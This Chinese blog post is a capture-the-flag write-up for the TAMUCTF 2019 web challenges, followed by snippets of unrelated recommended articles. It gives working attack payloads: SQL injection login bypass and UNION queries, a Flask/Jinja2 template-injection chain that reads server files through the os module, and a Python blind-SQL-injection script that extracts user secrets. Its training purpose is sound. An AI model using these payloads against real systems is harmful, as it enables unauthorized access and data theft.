TAMUCTF2019 web writeup

最新推荐文章于 2022-11-08 14:44:51 发布
最新推荐文章于 2022-11-08 14:44:51 发布
阅读量793 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stepone4ward/article/details/88174014
版权

Not Another SQLi Challenge

万能密码 payload:username=admin&password=1'or 1=1#

Buckets

针对BUCKET的探针,使用浏览器打开Amazon提供的自动分配的S3 URL,格式为http://bucketname.s3.amazonaws.com 也就是修改url为http://tamuctf.s3.amazonaws.com/ 获得一个不受访问权限的bucket,找到关键文档Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt,获得flag。
学习资料:https://www.freebuf.com/articles/web/135313.html

Science!

直接给出提示flask,判断是ssti模板注入。测试注入点Chemical1,payload1.{{config}},注入存在
step1:1.{{[].__class__.__base__.__subclasses__()}}访问所有模块得到catch_warnings位置。
step2:{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals.keys()}}得到linecache,可以访问os模块了。
step3:{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].listdir('.')}}查看所有文件,得到flag.txt。
step4:1.{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].read([].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].open("flag.txt",[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].O_RDONLY),40)}}得到flag。

Robots Rule

提到robots,查看robots.txt
在这里插入图片描述
想让我们伪造成一个googlebot,百度一个googlebot的useragent
在这里插入图片描述
改一下user-agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)")
在这里插入图片描述

Many Gig’ems to you!

一个拼接的flag
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到flag:gigem{flag_in_source_and_}

Bird Box Challenge

开始的时候,使用了-1'union select database()#等一系列的语句读出库名,表名等一系列数据,但是都没有什么价值。库名:SqliDB,表名:Search,列名:items,查询内容:Eggs,Trucks,Aggies
最后google了一下writeup,看到flag藏到了user()当中,真的是没有想到…
payload:-1'union select user()#
在这里插入图片描述

1337 Secur1ty

开始的时候注册完就直接点开了message,是一个类似于guestbook的界面,下意识地反应这应该是一个关于xss的问题,但是邮件发不出去…,用burp抓取登陆的界面,看到了Cookie当中的userid和secret,userid应当是修改为1了,但是secret却不知道应该修改为何值。
在这里插入图片描述
此处找到了注入点id,进行bool类型的盲注

import requests
s=requests.session()
ans=''
for i in range(1,50):
    for j in range(37,127):
        #url="http://web6.tamuctf.com/message?id=1%27+and+ascii(substr((select+schema_name+from+information_schema.schemata%20limit+0%2C1)%2C"+str(i)+"%2C1))%3D"+str(j)+"+and+1%3D%271"
        #url="http://web6.tamuctf.com/message?id=1%27%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27Users%27limit%209,1),"+str(i)+",1))%3D"+str(j)+"%20and%201=%271"
        #url="http://web6.tamuctf.com/message?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()limit%202,1),"+str(i)+",1))%3D"+str(j)+"%20and%201=%271"
        url="http://web6.tamuctf.com/message?id=1%27%20and ascii(substr((select Secret from Users limit 0,1),"+str(i)+",1))="+str(j)+" and 1='1"
        c=s.get(url)
        if 'Bob' in c.text:
            ans=ans+chr(j)
            print('ans',ans)
            break

在这里插入图片描述
在这里插入图片描述
burp修改一下cookie,得到flag。
在这里插入图片描述

GAPPPPP
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AeroCTF 2019 部分题目Writeup
iqiqiya的博客
03-27 1581
0x01: 【Forensic】undefined protocol 题目说明:We managed to get traffic from the machine of one of the hackers who hacked our navigation systems, but they use some kind of strange protocol over TCP. We wer...
ISCC 2019 writeup
汐白
05-25 1499
ISCC2019 writeupMisc1. 隐藏的信息2. 最危险的地方就是最安全的地方3. 解密成绩单4. Welcome5. 倒立屋6. 无法运行的exe7. High起来!8. 他们能在一起吗?9. Keyes' secret10. Aesop's secret11. 碎纸机Web1. web12. web23. web34. web45. web56. web6Reverse1. ans...
DDCTF2019web----滴~
Superpig的博客
04-28 350
题目链接 题目界面: 首先,观察!! 1、titile和get传送的数据jpg的内容是一样的,而且很像是加密过的字符串 2、img函数提供的参数有提到base64,猜测其后的内容是base64加密的内容 然后,尝试: 1、将jpg后面的内容用base64解密,得到NjY2QzYxNjcyRTZBNzA2Nw== 2、看起来还是像base64加密的内容,再次解密,得到666C61672E6A706...
DDCTF writeup
晨暮的博客
04-22 1156
首先来看我们的题目将文件下载进行题目分析,我们会发现,这个图片所占空间较大,超出了平常图片的范围 猜测,图片内隐藏了文件对图片进行字节码分析发现文件内藏有压缩文件对其进行分离发现分理出一个带有密码的压缩文件对压缩包进行破解解压得 进行一顿栅栏,编码等解密,无果。破了很久,最后回头看题目看了的提示得flagDDCTF{x1n9shaNgbIci} ...
2019DDctfWP
BerL1n
12-29 503
Time: 2019-04-27 11:46 本来想挺进前三十呢,结果大佬们都太强了,无奈。。 web 滴~ 打开界面就一张图片。 注意url http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 参数这经过一次base16,两次base64,加密,解密后也就是flag.jpg,因此可尝试读取index.php,经过加密后为TmprMlJUWTBOalUzT0RKRk56QTJPRGN3 访问源代码 base64解
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup
2019美亚杯writeup
03-26
本资源摘要信息来自2019美亚杯writeup,内容涉及电子数据取证大赛的相关检材和试题等。电子数据取证大赛是一项测试电子数据取证和分析能力的比赛,参赛者需要对提供的镜像文件进行分析,回答相关问题。 本资源摘要...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
2019ISCC writeup(相对简单)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
2019.4 DDCTF web题--滴 writeup
04-14
DDCTF,2019年4月比赛,web题,第一题--滴 writeup,及flag。
2019ddctf web WriteUp
weixin_43999372的博客
04-20 609
web 1.滴 看到链接地址 http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 两次 base64 decode,再 hex2bin,得到 flag.jpg 想到是文件读取,index.php 装换为16进制,然后2次base64 encode,...
TAMU ctf pwn部分wp+赛后
z1r0的博客
04-19 2340
TAMU ctf pwn部分wp 国外的题目,终端连不上就很gan ga。。。。。。 Tr*vial 大水题,栈溢出,ret2text exp from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1b[01
CrewCTF 2022 + DCTF 22 + TAMUctf 2022 一些writeup
ShenZ的博客
04-20 982
CrewCTF 2022 + DCTF 22 + TAMUctf 2022 一些writeup CrewCTF 2022 web - CuaaS DCTF 22 Forensics - Hidden Fox TAMUctf 2022 web - Lock Out web - Serial Killer 给了源码 index.php <?php if($_SERVER['REQUEST_METHOD'] == "POST" and isset($_POST['url']))
SQL靶场练习总结
weixin_51884452的博客
11-08 603
sql注入总结
XCTF-攻防世界CTF平台-Web类——16、shrine(Flask框架之Jinja2模板渲染引擎、查看app.config[‘FLAG‘])
Onlyone_1314的博客
12-11 1572
目录标题python模板注入代码分析:构造Python模板注入url_for()函数查看flagget_flashed_messages()函数查看flag 打开题目地址: 这是Python的flask渲染模板 python模板注入 python模板注入漏洞的产生在于Flask应用框架中render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,而且Flask模板中使用了Jinja2作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,在渲染的时候将{{}}包裹的内
xctf_如来十三掌
bring_coco的博客
07-11 626
如来十三掌 [目标] 破解密文 [环境] Windows [工具] 与佛论坛 Rot13解码 Base64解码 [分析] 1.打开该文件,发现处于word中的一堆经文 一开始只是对黑体字产生疑惑,但最终发现什么用也没有 2.经过其他人的wp,才了解到设计经文的是与与佛论坛有关,也是属于编码解码网站,因此通过密文解明文得到一串编码。注意,密文开头都为佛曰: 3.得到一串编码,因为题目是如来十三掌,因此感觉是rot13编码,ROT13码意思是将字母左移13位。如’A’ ↔ ‘N’, ‘B’ ↔ ‘O’,‘V
攻防世界 - MISC - 10 - 如来十三掌
古月浪子的博客
10-03 5220
攻防世界 - MISC - 10 - 如来十三掌审题思路知识点所需工具解题flag反思与心得 审题 思路 审题很重要!审题很重要!审题很重要!做这道题就靠审题了 知识点 考查选手对各种加密方法的了解 所需工具 WPS、CTFCrackTools 解题 打开附件,发现一大堆莫名其妙的文字,结合题目,联想到佛曰加密 放到在线佛曰加解密网站上解密 老规矩,base64解密一下,发现不行,仔细读题锁...
DDCTF部分WP
dydxdz的博客
04-22 6001
这周去打了DDCTF,花了一周做出了九道题,完成了1000分的梦想。也算是菜鸡打比赛这么久拿到分数最多的一次了,现记录如下: MISC 1、(╯°□°)╯︵ ┻━┻ (╯°□°)╯︵ ┻━┻ d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1b2e2e5e2b5b4e4b8b7e...
2019年CTF3月比赛记录(一):BSidesSF 2019 CTF_Web部分题目writeup与重解
極品━═☆宏的博客
03-07 3944
2019年CTF比赛记录(一) 为了更好地学习CTF方面的相关知识,本着以赛促学的目的,决定自己报名参加一些2019年的CTF比赛,在比赛中去学其他的知识,帮助自己更好的学习Web方面的知识。限于个人能力有限,而且在时间上的限制,比赛中仅对自己当时看到的题目和解出的题目进行了解答。 比赛:BSidesSF 2019 CTF 时间:2019年3月4日至2019年3月5日 ...
iscc2015官方writeup
最新发布
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值